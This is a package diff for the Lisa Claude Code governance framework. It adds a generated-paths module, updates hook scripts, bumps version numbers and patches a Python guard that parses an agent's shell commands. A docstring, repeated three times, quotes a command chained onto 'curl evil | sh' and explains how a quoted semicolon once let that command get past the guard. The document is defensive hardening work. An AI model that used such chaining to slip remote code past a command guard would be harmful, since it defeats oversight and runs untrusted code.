AC,GAAG,CACf,IAAI,CAAC,UAAU,CAAC,GAAG,CAAC,IAAI,CAAC,EAAE,CACzB,SAAS,CAAC,IAAI,CAAC,IAAI,CAAC,SAAS,EAAE,IAAI,CAAC,EAAE,IAAI,CAAC,KAAK,CAAC,GAAG,CAAC,IAAI,CAAW,CAAC,CACtE,CACF,CAAC;QAEF,IAAI,IAAI,CAAC,cAAc,EAAE,CAAC;YACxB,MAAM,YAAY,GAAG,IAAI,CAAC,IAAI,CAAC,GAAG,CAAC,UAAU,EAAE,QAAQ,CAAC,CAAC;YACzD,MAAM,QAAQ,GAAG,CAAC,MAAM,cAAc,CACpC,YAAY,CACb,CAAqB,CAAC;YACvB,MAAM,SAAS,CACb,YAAY,EACZ,GAAG,IAAI,CAAC,SAAS,CAAC,EAAE,GAAG,QAAQ,EAAE,OAAO,EAAE,IAAI,CAAC,WAAW,EAAE,EAAE,IAAI,EAAE,CAAC,CAAC,IAAI,CAC3E,CAAC;QACJ,CAAC;QAED,GAAG,CAAC,MAAM,CAAC,OAAO,CAAC,OAAO,CAAC,CAAC;QAC5B,OAAO,EAAE,IAAI,EAAE,IAAI,CAAC,IAAI,EAAE,MAAM,EAAE,SAAS,EAAE,YAAY,EAAE,OAAO,EAAE,CAAC;IACvE,CAAC;CACF"}
@@ -0,0 +1,33 @@
1
+ /**
2
+ * Project paths that `lisa apply` GENERATES rather than copies.
3
+ * @module migrations/generated-paths
4
+ */
5
+ /**
6
+ * Repo-relative prefixes that apply regenerates on every run.
7
+ *
8
+ * A generated path fails differently from a `copy-overwrite` template, and the
9
+ * difference decides what a guard should tell someone who edits one:
10
+ *
11
+ * - **`copy-overwrite`, host-edited** — apply PRESERVES it. The file silently
12
+ * forks and stops receiving upstream fixes while looking current. Measured:
13
+ * four mutated files, `Overwritten: 0`.
14
+ * - **generated** — apply REBUILDS it. The edit works locally, CI agrees, and
15
+ * the next `bun install` reverts it with nothing reporting that it had.
16
+ *
17
+ * So this list exists to let one guard give two accurate answers, rather than
18
+ * one answer that is wrong for half the files it covers.
19
+ *
20
+ * It is the SINGLE source: the migration that vendors a tree imports its prefix
21
+ * from here, and the hook reads this module out of the installed package. A
22
+ * hook carrying its own copy of the list would be the defect this repository
23
+ * has filed repeatedly — a second place to update that nobody updates, which
24
+ * then governs silently.
25
+ */
26
+ export declare const GENERATED_PATH_PREFIXES: readonly string[];
27
+ /**
28
+ * Whether a repo-relative path is regenerated by apply.
29
+ * @param relativePath - Repo-relative destination path
30
+ * @returns True when apply rebuilds this path rather than copying it
31
+ */
32
+ export declare function isGeneratedPath(relativePath: string): boolean;
33
+ //# sourceMappingURL=generated-paths.d.ts.map
@@ -0,0 +1 @@
1
+ {"version":3,"file":"generated-paths.d.ts","sourceRoot":"","sources":["../../src/migrations/generated-paths.ts"],"names":[],"mappings":"AAAA;;;GAGG;AAEH;;;;;;;;;;;;;;;;;;;;GAoBG;AACH,eAAO,MAAM,uBAAuB,EAAE,SAAS,MAAM,EAA0B,CAAC;AAEhF;;;;GAIG;AACH,wBAAgB,eAAe,CAAC,YAAY,EAAE,MAAM,GAAG,OAAO,CAK7D"}
@@ -0,0 +1,36 @@
1
+ /**
2
+ * Project paths that `lisa apply` GENERATES rather than copies.
3
+ * @module migrations/generated-paths
4
+ */
5
+ /**
6
+ * Repo-relative prefixes that apply regenerates on every run.
7
+ *
8
+ * A generated path fails differently from a `copy-overwrite` template, and the
9
+ * difference decides what a guard should tell someone who edits one:
10
+ *
11
+ * - **`copy-overwrite`, host-edited** — apply PRESERVES it. The file silently
12
+ * forks and stops receiving upstream fixes while looking current. Measured:
13
+ * four mutated files, `Overwritten: 0`.
14
+ * - **generated** — apply REBUILDS it. The edit works locally, CI agrees, and
15
+ * the next `bun install` reverts it with nothing reporting that it had.
16
+ *
17
+ * So this list exists to let one guard give two accurate answers, rather than
18
+ * one answer that is wrong for half the files it covers.
19
+ *
20
+ * It is the SINGLE source: the migration that vendors a tree imports its prefix
21
+ * from here, and the hook reads this module out of the installed package. A
22
+ * hook carrying its own copy of the list would be the defect this repository
23
+ * has filed repeatedly — a second place to update that nobody updates, which
24
+ * then governs silently.
25
+ */
26
+ export const GENERATED_PATH_PREFIXES = [".lisa/lisa-oxlint"];
27
+ /**
28
+ * Whether a repo-relative path is regenerated by apply.
29
+ * @param relativePath - Repo-relative destination path
30
+ * @returns True when apply rebuilds this path rather than copying it
31
+ */
32
+ export function isGeneratedPath(relativePath) {
33
+ const normalised = relativePath.replaceAll("\\", "/").replace(/^\.\//u, "");
34
+ return GENERATED_PATH_PREFIXES.some(prefix => normalised === prefix || normalised.startsWith(`${prefix}/`));
35
+ }
36
+ //# sourceMappingURL=generated-paths.js.map
@@ -0,0 +1 @@
1
+ {"version":3,"file":"generated-paths.js","sourceRoot":"","sources":["../../src/migrations/generated-paths.ts"],"names":[],"mappings":"AAAA;;;GAGG;AAEH;;;;;;;;;;;;;;;;;;;;GAoBG;AACH,MAAM,CAAC,MAAM,uBAAuB,GAAsB,CAAC,mBAAmB,CAAC,CAAC;AAEhF;;;;GAIG;AACH,MAAM,UAAU,eAAe,CAAC,YAAoB;IAClD,MAAM,UAAU,GAAG,YAAY,CAAC,UAAU,CAAC,IAAI,EAAE,GAAG,CAAC,CAAC,OAAO,CAAC,QAAQ,EAAE,EAAE,CAAC,CAAC;IAC5E,OAAO,uBAAuB,CAAC,IAAI,CACjC,MAAM,CAAC,EAAE,CAAC,UAAU,KAAK,MAAM,IAAI,UAAU,CAAC,UAAU,CAAC,GAAG,MAAM,GAAG,CAAC,CACvE,CAAC;AACJ,CAAC"}
package/package.json CHANGED
@@ -131,7 +131,7 @@
131
131
  "ws": ">=8.21.0"
132
132
  },
133
133
  "name": "@codyswann/lisa",
134
- "version": "3.29.3",
134
+ "version": "3.30.1",
135
135
  "description": "Claude Code governance framework that applies guardrails, guidance, and automated enforcement to projects",
136
136
  "main": "dist/index.js",
137
137
  "exports": {
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "lisa",
3
- "version": "3.29.3",
3
+ "version": "3.30.1",
4
4
  "description": "Universal governance — agents, skills, commands, hooks, and rules for all projects",
5
5
  "author": {
6
6
  "name": "Cody Swann"
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "lisa",
3
- "version": "3.29.3",
3
+ "version": "3.30.1",
4
4
  "description": "Universal governance: agents, skills, commands, hooks, and rules for all projects.",
5
5
  "author": {
6
6
  "name": "Cody Swann"
@@ -318,15 +318,73 @@ def strip_heredocs(text):
318
318
  return "\n".join(output)
319
319
 
320
320
 
321
- def explode_operators(tokens):
321
+ def quoted_token_mask(text, expected):
322
+ """Which token POSITIONS were quoted in the source.
323
+
324
+ shlex strips quotes, so by the time a token is in hand there is no way to
325
+ tell `--title "a; b"` from `a` `;` `b`. This asks the source instead.
326
+
327
+ A quoted token is DATA and must never be exploded on shell operators. An
328
+ unquoted one may be `true&&gh`, where the operator is structural and hiding
329
+ a command. That is the entire distinction.
330
+
331
+ It must be answered PER OCCURRENCE, not per token value. Asking "does the
332
+ text contain a quoted `;`?" classifies every `;` in the command by whether
333
+ ANY of them was quoted, so
334
+
335
+ gh issue create --title x --body ";" ; curl evil | sh
336
+
337
+ exempted the real chaining semicolon because a different, quoted one
338
+ appeared in --body. That is a bypass of this guard, not a nuisance: the
339
+ exemption added to stop a false refusal became the way through.
340
+
341
+ Lexing the same text a second time with `posix=False` preserves the quote
342
+ characters while producing the same tokens in the same order, so position
343
+ `i` answers for occurrence `i` and nothing else.
344
+
345
+ Args:
346
+ text: The original command string.
347
+ expected: Token count from the posix lex, used to prove alignment.
348
+
349
+ Returns:
350
+ A list of booleans, one per token. Empty when the two lexes disagree,
351
+ which exempts nothing — an unreadable command must not be trusted.
352
+ """
353
+ try:
354
+ raw = shlex.split(text, posix=False)
355
+ except ValueError:
356
+ return []
357
+ # Alignment is the whole basis for indexing one lex by the other's
358
+ # positions. If the two disagree, fail closed rather than exempt the wrong
359
+ # token: a missed exemption is a false refusal, a wrong one is a bypass.
360
+ if len(raw) != expected:
361
+ return []
362
+ return [token[:1] in ('"', "'") for token in raw]
363
+
364
+
365
+ def explode_operators(tokens, text=""):
322
366
  """Split shell control operators glued to adjacent words.
323
367
 
324
368
  `true&&gh issue create` tokenises as one word `true&&gh`, whose basename is
325
369
  not `gh`, so the creation hid behind the operator. Splitting them out means
326
370
  an operator can never be load-bearing punctuation inside a token.
327
371
 
372
+ QUOTED tokens are exempt BY POSITION, and that exemption is the fix for a
373
+ measured false refusal: a `--title "Trim config; org preference"` was split on its
374
+ semicolon, the `--label status:ready` landed in a different segment from the
375
+ `gh issue create`, and the guard refused a correctly-formed filing while
376
+ telling the author to add the label they had already added. Recorded on
377
+ CodySwannGT/lisa#2634 after it blocked a real filing.
378
+
379
+ `shlex.shlex(punctuation_chars=True)` is NOT the fix and was measured: it
380
+ tokenises the glued case correctly but shatters a GraphQL payload —
381
+ `query=mutation{issueCreate(input:{})}` becomes three fragments — which is
382
+ the exact regression the GLUED_OPERATORS comment above records as having
383
+ silently un-refused every GraphQL creation.
384
+
328
385
  Args:
329
386
  tokens: Tokens from shlex.
387
+ text: The original command string, used to detect quoting.
330
388
 
331
389
  Returns:
332
390
  Tokens with operators separated out.
@@ -335,7 +393,11 @@ def explode_operators(tokens):
335
393
  "(" + "|".join(re.escape(op) for op in GLUED_OPERATORS) + ")"
336
394
  )
337
395
  exploded = []
338
- for token in tokens:
396
+ quoted = quoted_token_mask(text, len(tokens)) if text else []
397
+ for index, token in enumerate(tokens):
398
+ if index < len(quoted) and quoted[index]:
399
+ exploded.append(token)
400
+ continue
339
401
  for piece in pattern.split(token):
340
402
  if piece:
341
403
  exploded.append(piece)
@@ -687,9 +749,8 @@ def scan(text, depth):
687
749
  A refusal signature, or None when nothing creation-shaped was found.
688
750
  """
689
751
  try:
690
- tokens = explode_operators(
691
- shlex.split(strip_heredocs(text), posix=True)
692
- )
752
+ stripped = strip_heredocs(text)
753
+ tokens = explode_operators(shlex.split(stripped, posix=True), stripped)
693
754
  except ValueError:
694
755
  # Bash's grammar is not shlex's. `gh issue create --title x #'` is a
695
756
  # comment to bash, which strips it and RUNS the create, while shlex
@@ -196,6 +196,45 @@ managed_source() {
196
196
  return 0
197
197
  fi
198
198
  done
199
+ # A generated path has no template to point at — apply rebuilds it from the
200
+ # migration rather than copying it — so the source is named for the reader
201
+ # rather than resolved to a file that does not exist.
202
+ if generated_path "$rel"; then
203
+ printf '%s' "generated by lisa apply"
204
+ return 0
205
+ fi
206
+ return 1
207
+ }
208
+
209
+ # Whether a destination is a path `lisa apply` GENERATES rather than copies.
210
+ #
211
+ # Read out of the installed package, never restated here.
212
+ # `dist/migrations/generated-paths.js` is the single source the vendoring
213
+ # migration also imports, so a new generated tree is covered without editing this
214
+ # hook. A hook carrying its own copy of that list would be a second place to
215
+ # update that nobody updates, which then governs silently — the defect this file
216
+ # already documents for copy-overwrite, one step along.
217
+ #
218
+ # The distinction earns its keep because the two populations fail in OPPOSITE
219
+ # ways, and a guard that gives one answer is wrong for half the files it covers:
220
+ # an edited copy-overwrite file is PRESERVED and silently forks, while a
221
+ # generated file is REBUILT and the edit vanishes on the next install.
222
+ generated_path() {
223
+ local rel="$1"
224
+ local module="$package_root/dist/migrations/generated-paths.js"
225
+ [ -f "$module" ] || return 1
226
+ local prefixes
227
+ prefixes="$(grep -oE '"[^"]+"' "$module" 2>/dev/null | tr -d '"')"
228
+ local prefix
229
+ for prefix in $prefixes; do
230
+ case "$prefix" in
231
+ */*) ;;
232
+ *) continue ;;
233
+ esac
234
+ case "$rel" in
235
+ "$prefix" | "$prefix"/*) return 0 ;;
236
+ esac
237
+ done
199
238
  return 1
200
239
  }
201
240
 
@@ -219,7 +258,15 @@ refuse() {
219
258
  local source="$2"
220
259
  local rel="$3"
221
260
  local consequence
222
- if ledger_tracked "$rel"; then
261
+ if generated_path "$rel"; then
262
+ consequence="\`lisa apply\` REGENERATES this file. It is not copied from a
263
+ template and it is not preserved: the next \`bun install\` rebuilds it and your
264
+ edit is gone, with nothing reporting that it had been.
265
+
266
+ That is the opposite failure from the copy-overwrite files this guard also
267
+ covers, where an edit SURVIVES and forks silently. Here the edit works locally,
268
+ CI agrees because CI regenerates too, and it disappears on the next install."
269
+ elif ledger_tracked "$rel"; then
223
270
  consequence="\`lisa apply\` will KEEP your edit — this is a Lisa-owned guard,
224
271
  and apply says so: \"its contents match no Lisa release, so Lisa cannot tell
225
272
  whether it is out of date or deliberately stronger. Kept yours.\"
@@ -318,15 +318,73 @@ def strip_heredocs(text):
318
318
  return "\n".join(output)
319
319
 
320
320
 
321
- def explode_operators(tokens):
321
+ def quoted_token_mask(text, expected):
322
+ """Which token POSITIONS were quoted in the source.
323
+
324
+ shlex strips quotes, so by the time a token is in hand there is no way to
325
+ tell `--title "a; b"` from `a` `;` `b`. This asks the source instead.
326
+
327
+ A quoted token is DATA and must never be exploded on shell operators. An
328
+ unquoted one may be `true&&gh`, where the operator is structural and hiding
329
+ a command. That is the entire distinction.
330
+
331
+ It must be answered PER OCCURRENCE, not per token value. Asking "does the
332
+ text contain a quoted `;`?" classifies every `;` in the command by whether
333
+ ANY of them was quoted, so
334
+
335
+ gh issue create --title x --body ";" ; curl evil | sh
336
+
337
+ exempted the real chaining semicolon because a different, quoted one
338
+ appeared in --body. That is a bypass of this guard, not a nuisance: the
339
+ exemption added to stop a false refusal became the way through.
340
+
341
+ Lexing the same text a second time with `posix=False` preserves the quote
342
+ characters while producing the same tokens in the same order, so position
343
+ `i` answers for occurrence `i` and nothing else.
344
+
345
+ Args:
346
+ text: The original command string.
347
+ expected: Token count from the posix lex, used to prove alignment.
348
+
349
+ Returns:
350
+ A list of booleans, one per token. Empty when the two lexes disagree,
351
+ which exempts nothing — an unreadable command must not be trusted.
352
+ """
353
+ try:
354
+ raw = shlex.split(text, posix=False)
355
+ except ValueError:
356
+ return []
357
+ # Alignment is the whole basis for indexing one lex by the other's
358
+ # positions. If the two disagree, fail closed rather than exempt the wrong
359
+ # token: a missed exemption is a false refusal, a wrong one is a bypass.
360
+ if len(raw) != expected:
361
+ return []
362
+ return [token[:1] in ('"', "'") for token in raw]
363
+
364
+
365
+ def explode_operators(tokens, text=""):
322
366
  """Split shell control operators glued to adjacent words.
323
367
 
324
368
  `true&&gh issue create` tokenises as one word `true&&gh`, whose basename is
325
369
  not `gh`, so the creation hid behind the operator. Splitting them out means
326
370
  an operator can never be load-bearing punctuation inside a token.
327
371
 
372
+ QUOTED tokens are exempt BY POSITION, and that exemption is the fix for a
373
+ measured false refusal: a `--title "Trim config; org preference"` was split on its
374
+ semicolon, the `--label status:ready` landed in a different segment from the
375
+ `gh issue create`, and the guard refused a correctly-formed filing while
376
+ telling the author to add the label they had already added. Recorded on
377
+ CodySwannGT/lisa#2634 after it blocked a real filing.
378
+
379
+ `shlex.shlex(punctuation_chars=True)` is NOT the fix and was measured: it
380
+ tokenises the glued case correctly but shatters a GraphQL payload —
381
+ `query=mutation{issueCreate(input:{})}` becomes three fragments — which is
382
+ the exact regression the GLUED_OPERATORS comment above records as having
383
+ silently un-refused every GraphQL creation.
384
+
328
385
  Args:
329
386
  tokens: Tokens from shlex.
387
+ text: The original command string, used to detect quoting.
330
388
 
331
389
  Returns:
332
390
  Tokens with operators separated out.
@@ -335,7 +393,11 @@ def explode_operators(tokens):
335
393
  "(" + "|".join(re.escape(op) for op in GLUED_OPERATORS) + ")"
336
394
  )
337
395
  exploded = []
338
- for token in tokens:
396
+ quoted = quoted_token_mask(text, len(tokens)) if text else []
397
+ for index, token in enumerate(tokens):
398
+ if index < len(quoted) and quoted[index]:
399
+ exploded.append(token)
400
+ continue
339
401
  for piece in pattern.split(token):
340
402
  if piece:
341
403
  exploded.append(piece)
@@ -687,9 +749,8 @@ def scan(text, depth):
687
749
  A refusal signature, or None when nothing creation-shaped was found.
688
750
  """
689
751
  try:
690
- tokens = explode_operators(
691
- shlex.split(strip_heredocs(text), posix=True)
692
- )
752
+ stripped = strip_heredocs(text)
753
+ tokens = explode_operators(shlex.split(stripped, posix=True), stripped)
693
754
  except ValueError:
694
755
  # Bash's grammar is not shlex's. `gh issue create --title x #'` is a
695
756
  # comment to bash, which strips it and RUNS the create, while shlex
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "lisa",
3
- "version": "3.29.3",
3
+ "version": "3.30.1",
4
4
  "description": "Universal governance — agents, skills, commands, hooks, and rules for all projects",
5
5
  "author": {
6
6
  "name": "Cody Swann"
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "lisa-cdk",
3
- "version": "3.29.3",
3
+ "version": "3.30.1",
4
4
  "description": "AWS CDK-specific plugin",
5
5
  "author": {
6
6
  "name": "Cody Swann"
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "lisa-cdk",
3
- "version": "3.29.3",
3
+ "version": "3.30.1",
4
4
  "description": "AWS CDK-specific Lisa plugin.",
5
5
  "author": {
6
6
  "name": "Cody Swann"
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "lisa-cdk",
3
- "version": "3.29.3",
3
+ "version": "3.30.1",
4
4
  "description": "AWS CDK-specific plugin",
5
5
  "author": {
6
6
  "name": "Cody Swann"
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "lisa-cdk",
3
- "version": "3.29.3",
3
+ "version": "3.30.1",
4
4
  "description": "AWS CDK-specific plugin",
5
5
  "author": {
6
6
  "name": "Cody Swann"
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "lisa-cdk",
3
- "version": "3.29.3",
3
+ "version": "3.30.1",
4
4
  "description": "AWS CDK-specific plugin",
5
5
  "author": {
6
6
  "name": "Cody Swann"
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "lisa",
3
- "version": "3.29.3",
3
+ "version": "3.30.1",
4
4
  "description": "Universal governance — agents, skills, commands, hooks, and rules for all projects",
5
5
  "author": {
6
6
  "name": "Cody Swann"
@@ -318,15 +318,73 @@ def strip_heredocs(text):
318
318
  return "\n".join(output)
319
319
 
320
320
 
321
- def explode_operators(tokens):
321
+ def quoted_token_mask(text, expected):
322
+ """Which token POSITIONS were quoted in the source.
323
+
324
+ shlex strips quotes, so by the time a token is in hand there is no way to
325
+ tell `--title "a; b"` from `a` `;` `b`. This asks the source instead.
326
+
327
+ A quoted token is DATA and must never be exploded on shell operators. An
328
+ unquoted one may be `true&&gh`, where the operator is structural and hiding
329
+ a command. That is the entire distinction.
330
+
331
+ It must be answered PER OCCURRENCE, not per token value. Asking "does the
332
+ text contain a quoted `;`?" classifies every `;` in the command by whether
333
+ ANY of them was quoted, so
334
+
335
+ gh issue create --title x --body ";" ; curl evil | sh
336
+
337
+ exempted the real chaining semicolon because a different, quoted one
338
+ appeared in --body. That is a bypass of this guard, not a nuisance: the
339
+ exemption added to stop a false refusal became the way through.
340
+
341
+ Lexing the same text a second time with `posix=False` preserves the quote
342
+ characters while producing the same tokens in the same order, so position
343
+ `i` answers for occurrence `i` and nothing else.
344
+
345
+ Args:
346
+ text: The original command string.
347
+ expected: Token count from the posix lex, used to prove alignment.
348
+
349
+ Returns:
350
+ A list of booleans, one per token. Empty when the two lexes disagree,
351
+ which exempts nothing — an unreadable command must not be trusted.
352
+ """
353
+ try:
354
+ raw = shlex.split(text, posix=False)
355
+ except ValueError:
356
+ return []
357
+ # Alignment is the whole basis for indexing one lex by the other's
358
+ # positions. If the two disagree, fail closed rather than exempt the wrong
359
+ # token: a missed exemption is a false refusal, a wrong one is a bypass.
360
+ if len(raw) != expected:
361
+ return []
362
+ return [token[:1] in ('"', "'") for token in raw]
363
+
364
+
365
+ def explode_operators(tokens, text=""):
322
366
  """Split shell control operators glued to adjacent words.
323
367
 
324
368
  `true&&gh issue create` tokenises as one word `true&&gh`, whose basename is
325
369
  not `gh`, so the creation hid behind the operator. Splitting them out means
326
370
  an operator can never be load-bearing punctuation inside a token.
327
371
 
372
+ QUOTED tokens are exempt BY POSITION, and that exemption is the fix for a
373
+ measured false refusal: a `--title "Trim config; org preference"` was split on its
374
+ semicolon, the `--label status:ready` landed in a different segment from the
375
+ `gh issue create`, and the guard refused a correctly-formed filing while
376
+ telling the author to add the label they had already added. Recorded on
377
+ CodySwannGT/lisa#2634 after it blocked a real filing.
378
+
379
+ `shlex.shlex(punctuation_chars=True)` is NOT the fix and was measured: it
380
+ tokenises the glued case correctly but shatters a GraphQL payload —
381
+ `query=mutation{issueCreate(input:{})}` becomes three fragments — which is
382
+ the exact regression the GLUED_OPERATORS comment above records as having
383
+ silently un-refused every GraphQL creation.
384
+
328
385
  Args:
329
386
  tokens: Tokens from shlex.
387
+ text: The original command string, used to detect quoting.
330
388
 
331
389
  Returns:
332
390
  Tokens with operators separated out.
@@ -335,7 +393,11 @@ def explode_operators(tokens):
335
393
  "(" + "|".join(re.escape(op) for op in GLUED_OPERATORS) + ")"
336
394
  )
337
395
  exploded = []
338
- for token in tokens:
396
+ quoted = quoted_token_mask(text, len(tokens)) if text else []
397
+ for index, token in enumerate(tokens):
398
+ if index < len(quoted) and quoted[index]:
399
+ exploded.append(token)
400
+ continue
339
401
  for piece in pattern.split(token):
340
402
  if piece:
341
403
  exploded.append(piece)
@@ -687,9 +749,8 @@ def scan(text, depth):
687
749
  A refusal signature, or None when nothing creation-shaped was found.
688
750
  """
689
751
  try:
690
- tokens = explode_operators(
691
- shlex.split(strip_heredocs(text), posix=True)
692
- )
752
+ stripped = strip_heredocs(text)
753
+ tokens = explode_operators(shlex.split(stripped, posix=True), stripped)
693
754
  except ValueError:
694
755
  # Bash's grammar is not shlex's. `gh issue create --title x #'` is a
695
756
  # comment to bash, which strips it and RUNS the create, while shlex
@@ -196,6 +196,45 @@ managed_source() {
196
196
  return 0
197
197
  fi
198
198
  done
199
+ # A generated path has no template to point at — apply rebuilds it from the
200
+ # migration rather than copying it — so the source is named for the reader
201
+ # rather than resolved to a file that does not exist.
202
+ if generated_path "$rel"; then
203
+ printf '%s' "generated by lisa apply"
204
+ return 0
205
+ fi
206
+ return 1
207
+ }
208
+
209
+ # Whether a destination is a path `lisa apply` GENERATES rather than copies.
210
+ #
211
+ # Read out of the installed package, never restated here.
212
+ # `dist/migrations/generated-paths.js` is the single source the vendoring
213
+ # migration also imports, so a new generated tree is covered without editing this
214
+ # hook. A hook carrying its own copy of that list would be a second place to
215
+ # update that nobody updates, which then governs silently — the defect this file
216
+ # already documents for copy-overwrite, one step along.
217
+ #
218
+ # The distinction earns its keep because the two populations fail in OPPOSITE
219
+ # ways, and a guard that gives one answer is wrong for half the files it covers:
220
+ # an edited copy-overwrite file is PRESERVED and silently forks, while a
221
+ # generated file is REBUILT and the edit vanishes on the next install.
222
+ generated_path() {
223
+ local rel="$1"
224
+ local module="$package_root/dist/migrations/generated-paths.js"
225
+ [ -f "$module" ] || return 1
226
+ local prefixes
227
+ prefixes="$(grep -oE '"[^"]+"' "$module" 2>/dev/null | tr -d '"')"
228
+ local prefix
229
+ for prefix in $prefixes; do
230
+ case "$prefix" in
231
+ */*) ;;
232
+ *) continue ;;
233
+ esac
234
+ case "$rel" in
235
+ "$prefix" | "$prefix"/*) return 0 ;;
236
+ esac
237
+ done
199
238
  return 1
200
239
  }
201
240
 
@@ -219,7 +258,15 @@ refuse() {
219
258
  local source="$2"
220
259
  local rel="$3"
221
260
  local consequence
222
- if ledger_tracked "$rel"; then
261
+ if generated_path "$rel"; then
262
+ consequence="\`lisa apply\` REGENERATES this file. It is not copied from a
263
+ template and it is not preserved: the next \`bun install\` rebuilds it and your
264
+ edit is gone, with nothing reporting that it had been.
265
+
266
+ That is the opposite failure from the copy-overwrite files this guard also
267
+ covers, where an edit SURVIVES and forks silently. Here the edit works locally,
268
+ CI agrees because CI regenerates too, and it disappears on the next install."
269
+ elif ledger_tracked "$rel"; then
223
270
  consequence="\`lisa apply\` will KEEP your edit — this is a Lisa-owned guard,
224
271
  and apply says so: \"its contents match no Lisa release, so Lisa cannot tell
225
272
  whether it is out of date or deliberately stronger. Kept yours.\"